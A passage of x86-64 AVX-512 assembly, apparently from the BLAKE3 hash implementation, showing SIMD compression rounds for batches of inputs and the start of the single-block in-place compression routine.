vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm26
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm22
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm31
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
movzx eax, byte ptr [rbp+0x38]
jne 2b
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp]
vmovdqa ymm2, ymmword ptr [rsp+0x2*0x20]
vmovdqa32 ymm0 {k1}, ymmword ptr [rsp+0x1*0x20]
vmovdqa32 ymm2 {k1}, ymmword ptr [rsp+0x3*0x20]
vmovdqa ymmword ptr [rsp], ymm0
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm2
add rbx, 256
mov qword ptr [rbp+0x50], rbx
add rdi, 64
sub rsi, 8
3:
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x80]
movzx r13, byte ptr [rbp+0x38]
movzx r12, byte ptr [rbp+0x48]
test esi, 0x4
je 3f
vbroadcasti32x4 zmm0, xmmword ptr [rcx]
vbroadcasti32x4 zmm1, xmmword ptr [rcx+0x1*0x10]
vmovdqa xmm12, xmmword ptr [rsp]
vmovdqa xmm13, xmmword ptr [rsp+0x4*0x10]
vpunpckldq xmm14, xmm12, xmm13
vpunpckhdq xmm15, xmm12, xmm13
vpermq ymm14, ymm14, 0xDC
vpermq ymm15, ymm15, 0xDC
vpbroadcastd zmm12, dword ptr [BLAKE3_BLOCK_LEN+rip]
vinserti64x4 zmm13, zmm14, ymm15, 0x01
mov eax, 17476
kmovw k2, eax
vpblendmd zmm13 {k2}, zmm13, zmm12
vbroadcasti32x4 zmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov eax, 43690
kmovw k3, eax
mov eax, 34952
kmovw k4, eax
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vmovdqa32 zmm2, zmm15
vpbroadcastd zmm8, dword ptr [rsp+0x22*0x4]
vpblendmd zmm3 {k4}, zmm13, zmm8
vmovups zmm8, zmmword ptr [r8+rdx-0x1*0x40]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x4*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x4*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x4*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x30]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x3*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x3*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x3*0x10], 0x03
vshufps zmm4, zmm8, zmm9, 136
vshufps zmm5, zmm8, zmm9, 221
vmovups zmm8, zmmword ptr [r8+rdx-0x20]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x2*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x2*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x2*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x10]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x1*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x1*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x1*0x10], 0x03
vshufps zmm6, zmm8, zmm9, 136
vshufps zmm7, zmm8, zmm9, 221
vpshufd zmm6, zmm6, 0x93
vpshufd zmm7, zmm7, 0x93
mov al, 7
9:
vpaddd zmm0, zmm0, zmm4
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm5
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x93
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x39
vpaddd zmm0, zmm0, zmm6
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm7
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x39
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x93
dec al
jz 9f
vshufps zmm8, zmm4, zmm5, 214
vpshufd zmm9, zmm4, 0x0F
vpshufd zmm4, zmm8, 0x39
vshufps zmm8, zmm6, zmm7, 250
vpblendmd zmm9 {k3}, zmm9, zmm8
vpunpcklqdq zmm8, zmm7, zmm5
vpblendmd zmm8 {k4}, zmm8, zmm6
vpshufd zmm8, zmm8, 0x78
vpunpckhdq zmm5, zmm5, zmm7
vpunpckldq zmm6, zmm6, zmm5
vpshufd zmm7, zmm6, 0x1E
vmovdqa32 zmm5, zmm9
vmovdqa32 zmm6, zmm8
jmp 9b
9:
vpxord zmm0, zmm0, zmm2
vpxord zmm1, zmm1, zmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vextracti32x4 xmmword ptr [rbx+0x4*0x10], zmm0, 0x02
vextracti32x4 xmmword ptr [rbx+0x5*0x10], zmm1, 0x02
vextracti32x4 xmmword ptr [rbx+0x6*0x10], zmm0, 0x03
vextracti32x4 xmmword ptr [rbx+0x7*0x10], zmm1, 0x03
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x40]
vmovdqa32 xmm0 {k1}, xmmword ptr [rsp+0x1*0x10]
vmovdqa32 xmm2 {k1}, xmmword ptr [rsp+0x5*0x10]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x40], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test esi, 0x2
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x40], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x4]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x44], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x88]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x4*0x10]
vmovdqu32 xmm0 {k1}, xmmword ptr [rsp+0x8]
vmovdqu32 xmm2 {k1}, xmmword ptr [rsp+0x48]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x4*0x10], xmm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test esi, 0x1
je 4b
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm14, dword ptr [rsp]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x40], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vpinsrd xmm3, xmm14, eax, 3
vmovdqa xmm2, xmm15
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
_blake3_compress_in_place_avx512:
blake3_compress_in_place_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
